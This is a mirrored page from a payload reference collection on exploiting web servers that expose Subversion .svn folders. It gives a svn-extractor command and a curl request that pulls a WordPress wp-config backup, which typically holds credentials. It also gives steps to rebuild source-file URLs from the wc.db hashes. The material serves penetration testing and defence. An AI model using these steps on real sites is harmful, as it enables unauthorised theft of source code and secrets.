mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
1.6 KiB
1.6 KiB
Subversion
Subversion (often abbreviated as SVN) is a centralized version control system (VCS) that has been widely used in the software development industry. Originally developed by CollabNet Inc. in 2000, Subversion was designed to be an improved version of CVS (Concurrent Versions System) and has since gained significant traction for its robustness and reliability.
Summary
Tools
- anantshri/svn-extractor - Simple script to extract all web resources by means of .SVN folder exposed over network.
python svn-extractor.py --url "url with .svn available"
Methodology
curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
-
Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db
INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL); -
Download interesting files
- remove
$sha1$prefix - add
.svn-basepostfix - use first byte from hash as a subdirectory of the
pristine/directory (94in this case) - create complete path, which will be:
http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base
- remove